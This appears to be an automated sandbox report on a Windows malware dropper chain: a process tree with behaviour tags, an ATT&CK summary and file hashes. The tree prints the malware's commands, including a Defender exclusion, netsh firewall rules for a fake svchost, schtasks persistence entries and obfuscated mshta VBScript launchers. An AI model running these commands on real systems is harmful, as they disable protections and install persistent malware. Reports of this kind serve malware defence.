C:\Users\Admin\AppData\Local\Temp\is-L2M15.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-L2M15.tmp\postback.exe" ss19⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue132dd525eb51d2.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue132dd525eb51d2.exeTue132dd525eb51d2.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\VDLgOXF_Jx5vVPe7qW4thOVe.exe"C:\Users\Admin\Pictures\Adobe Films\VDLgOXF_Jx5vVPe7qW4thOVe.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\aaaSPc2PtzvTAeDTpwDSd3PG.exe"C:\Users\Admin\Pictures\Adobe Films\aaaSPc2PtzvTAeDTpwDSd3PG.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Users\Admin\Pictures\Adobe Films\bLCqLbeoS1vk6HwFKoG1WPni.exe"C:\Users\Admin\Pictures\Adobe Films\bLCqLbeoS1vk6HwFKoG1WPni.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\mRvJABXCifSAhUTtaxEQl7t8.exe"C:\Users\Admin\Pictures\Adobe Films\mRvJABXCifSAhUTtaxEQl7t8.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\i2CgVIrZifSNZnjq75V_2cUY.exe"C:\Users\Admin\Pictures\Adobe Films\i2CgVIrZifSNZnjq75V_2cUY.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\rMgcMIG5CYTFm8oA7NLdsKUX.exe"C:\Users\Admin\Pictures\Adobe Films\rMgcMIG5CYTFm8oA7NLdsKUX.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\4H4t2AsOcQSAHdHBjitYzETp.exe"C:\Users\Admin\Pictures\Adobe Films\4H4t2AsOcQSAHdHBjitYzETp.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\AFad10bImeuPMYb1rnBi1y1t.exe"C:\Users\Admin\Pictures\Adobe Films\AFad10bImeuPMYb1rnBi1y1t.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\d2pWMSMuJC2SPxoArZghL_Tl.exe"C:\Users\Admin\Pictures\Adobe Films\d2pWMSMuJC2SPxoArZghL_Tl.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\d2pWMSMuJC2SPxoArZghL_Tl.exe"C:\Users\Admin\Pictures\Adobe Films\d2pWMSMuJC2SPxoArZghL_Tl.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\pjzwUtoWYNUgBnf38F7pE4Jn.exe"C:\Users\Admin\Pictures\Adobe Films\pjzwUtoWYNUgBnf38F7pE4Jn.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\8P083V8LTI37jEjio3MwZLjf.exe"C:\Users\Admin\Pictures\Adobe Films\8P083V8LTI37jEjio3MwZLjf.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\qq0Ug9IY6CQizD6eOGc9J9Xo.exe"C:\Users\Admin\Pictures\Adobe Films\qq0Ug9IY6CQizD6eOGc9J9Xo.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\qq0Ug9IY6CQizD6eOGc9J9Xo.exe"C:\Users\Admin\Pictures\Adobe Films\qq0Ug9IY6CQizD6eOGc9J9Xo.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\M0B7OzUpFvRryaEWM29BOKgd.exe"C:\Users\Admin\Pictures\Adobe Films\M0B7OzUpFvRryaEWM29BOKgd.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\eZsF2OWRzuzNuvlJWHEsjxQF.exe"C:\Users\Admin\Pictures\Adobe Films\eZsF2OWRzuzNuvlJWHEsjxQF.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ByaHAL6bgI2pbhcsOF924P3v.exe"C:\Users\Admin\Pictures\Adobe Films\ByaHAL6bgI2pbhcsOF924P3v.exe"6⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\DLjV2s2ueZon3CTM60lS0VWW.exe"C:\Users\Admin\Pictures\Adobe Films\DLjV2s2ueZon3CTM60lS0VWW.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ATcMDXzAEysCGXKAKNWaCcaE.exe"C:\Users\Admin\Pictures\Adobe Films\ATcMDXzAEysCGXKAKNWaCcaE.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\Oybdv6qraCYyAyUtgT3A9cef.exe"C:\Users\Admin\Pictures\Adobe Films\Oybdv6qraCYyAyUtgT3A9cef.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"C:\Users\Admin\Pictures\Adobe Films\7xhwbY0KvS7fWRlyf2kBw7nO.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\cAnPd9XnYadqGjOKG42BcShO.exe"C:\Users\Admin\Pictures\Adobe Films\cAnPd9XnYadqGjOKG42BcShO.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1424279.exe"C:\Users\Admin\AppData\Roaming\1424279.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\8320946.exe"C:\Users\Admin\AppData\Roaming\8320946.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6733372.exe"C:\Users\Admin\AppData\Roaming\6733372.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\2694055.exe"C:\Users\Admin\AppData\Roaming\2694055.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\6262846.exe"C:\Users\Admin\AppData\Roaming\6262846.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe"C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0 , TRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF "" == "" for %s iN ( "C:\Users\Admin\Pictures\Adobe Films\KK531TsKmY_gwAkfdeE1FjAt.exe" ) do taskkill /Im "%~Nxs" -f8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "KK531TsKmY_gwAkfdeE1FjAt.exe" -f9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\NkkVSZW229sS2SE1vtc4j53k.exe"C:\Users\Admin\Pictures\Adobe Films\NkkVSZW229sS2SE1vtc4j53k.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe"C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\MKwn4IucqFaGlyJgs5uAGF21.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "MKwn4IucqFaGlyJgs5uAGF21.exe" -F9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\7dFCJ8QWIik4RzL943IocouY.exe"C:\Users\Admin\Pictures\Adobe Films\7dFCJ8QWIik4RzL943IocouY.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7fffa0d2dec0,0x7fffa0d2ded0,0x7fffa0d2dee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1668,4780668933732229197,7072907812709929884,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9532_1375310595" --mojo-platform-channel-handle=1696 /prefetch:89⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue137fdfa416e28ff.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue137fdfa416e28ff.exeTue137fdfa416e28ff.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2564435.exe"C:\Users\Admin\AppData\Roaming\2564435.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1145901.exe"C:\Users\Admin\AppData\Roaming\1145901.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6009642.exe"C:\Users\Admin\AppData\Roaming\6009642.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1940640.exe"C:\Users\Admin\AppData\Roaming\1940640.exe"6⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\343006.exe"C:\Users\Admin\AppData\Roaming\343006.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13bd9cb08d6.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bd9cb08d6.exeTue13bd9cb08d6.exe /mixone5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue13bd9cb08d6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bd9cb08d6.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue13bd9cb08d6.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13743175c95e24e0.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13743175c95e24e0.exeTue13743175c95e24e0.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-RH0BU.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-RH0BU.tmp\setup.tmp" /SL5="$20536,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A07KV.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-A07KV.tmp\setup.tmp" /SL5="$206BA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\is-CNL67.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-CNL67.tmp\postback.exe" ss111⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\8.exe"C:\Users\Admin\AppData\Local\Temp\8.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
-
C:\ProgramData\2916297.exe"C:\ProgramData\2916297.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\1001148.exe"C:\ProgramData\1001148.exe"8⤵
-
C:\ProgramData\7294222.exe"C:\ProgramData\7294222.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\6090931.exe"C:\ProgramData\6090931.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\6654171.exe"C:\ProgramData\6654171.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13a3eaad6ca1da2.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13a3eaad6ca1da2.exeTue13a3eaad6ca1da2.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13a3eaad6ca1da2.exeC:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13a3eaad6ca1da2.exe6⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\CrowdInspect64.exe"C:\Users\Admin\Desktop\CrowdInspect64.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Drops file in Windows directory
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Modify Registry
5Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue130c270d23c79.exeMD5
70d8e17fd898d07c41806f2223bd17d1
SHA1f03a879157a19193cb5fd6e3d5618576c79194ed
SHA2568bc3857a54345a12c4e0587839d193a0b5dfe7c7d812b1f76caedf1d21122c78
SHA5128e1cabfb1aaa6d6766bfbe56f968436fc422579390b47821369705ec681f894eeec227b6bb8f620f2876235795ef8bfe002e3ef6653fa92932e17cb27d22b541
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue130c270d23c79.exeMD5
70d8e17fd898d07c41806f2223bd17d1
SHA1f03a879157a19193cb5fd6e3d5618576c79194ed
SHA2568bc3857a54345a12c4e0587839d193a0b5dfe7c7d812b1f76caedf1d21122c78
SHA5128e1cabfb1aaa6d6766bfbe56f968436fc422579390b47821369705ec681f894eeec227b6bb8f620f2876235795ef8bfe002e3ef6653fa92932e17cb27d22b541
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue132b1547125d9.exeMD5
91e3bed725a8399d72b182e5e8132524
SHA10f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA25618af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13a47d89c50.exeMD5
0b67130e7f04d08c78cb659f54b20432
SHA1669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA5128f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exeMD5
b85eee1ee77b81debbb2c6c1cccedd57
SHA17e69f94d90af9f2c5f8cd7b337a513fc3a28011a
SHA256b2a7b9bf921f5ed3758a8b7fcaa7ab7c6c43155d3f07d67a6404ea324fc37aea
SHA51263a5e11fd5688996099cf07d1a1b9b58c70c5f60881d4ad7acd69e91be06fc3590de1640f26246f1b24b1be18df7c9b98cce92a5fee032c290a837d9c40246f5
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13c1be0d8f62bc.exeMD5
c447cdb7f9d41f5f754a696ffd1acc8c
SHA1d4b47106964860921625a1ef8406cf2a6f69199d
SHA25619016f6046c546c36eecab64a02330915059a71931fb6ccc1ab057d4805ba7db
SHA51222415dd83fabde64033d5c8b7bd7da08b6b5683becc63cd214222b8580a36157bbd323a5a82edc62489198c6e7265d8d7c0b77e6ec09c70917c29e7daa25baef
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13d68628efddb1.exeMD5
962b4643e91a2bf03ceeabcdc3d32fff
SHA1994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\libcurlpp.dllMD5
e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\libstdc++-6.dllMD5
5e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\libwinpthread-1.dllMD5
1e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\setup_install.exeMD5
d394cd023cfd126b740f29e6956ed362
SHA10f16447ebf97caa580cf73e9c05bf2aa8808ddae
SHA256b1bc03c90b4ebc8977c471c99c39622976834414613df20830a4669d853a21cf
